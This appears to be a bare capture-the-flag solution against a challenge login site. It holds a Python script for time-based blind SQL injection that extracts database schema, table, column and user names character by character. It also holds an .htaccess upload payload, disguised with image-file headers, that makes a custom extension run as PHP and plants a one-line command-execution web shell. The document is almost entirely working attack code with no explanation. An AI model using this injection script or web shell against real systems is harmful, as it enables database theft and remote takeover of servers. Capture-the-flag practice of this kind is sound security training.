1. SQL injection
2. file upload -> rce
sql_exploit.py
import requests
import string
import time
url = 'http://vkl-sql.darkarmy.xyz/login.php'
table_name = ''
strings = 'abcdefghijklmnopqrstuvwxyzABCDEFGHJIJKLMNOPQRSTUVWXYZ1234567890{}'
for i in range(1,80):
for j in strings:
#data = {'username':'admin" and if(ascii(substr((select schema_name from information_schema.schemata limit 4,1),'+str(i)+',1))='+str(ord(j))+',sleep(2),0)#','password':'aa'}
#data = {'username':'admin" and if(ascii(substr((select table_name from information_schema.tables where table_schema="darkcon" limit 0,1),'+str(i)+',1))='+str(ord(j))+',sleep(5),0)#','password':'aa'}
#data = {'username':'admin" and if(ascii(substr((select column_name from information_schema.columns where table_name="user" limit 1,1),'+str(i)+',1))='+str(ord(j))+',sleep(2),0)#','password':'aa'}
data = {'username':'admin" and if(ascii(substr((select username from user limit 0,1),'+str(i)+',1))='+str(ord(j))+',sleep(5),0)#','password':'aa'}
starttime = time.time()
res = requests.post(url,data=data)
endtime = time.time()
print(table_name+j)
if endtime-starttime>2:
print("find!")
table_name += str(j)
break
else:
continue
upload
#define width 1337
#define height 1337
AddType application/x-httpd-php .shell
php_value zend.multibyte 1
php_value zend.detect_unicode 1
php_value display_errors 1
<?php system($_GET['cmd']);?>
#define width 1337
#define height 1337
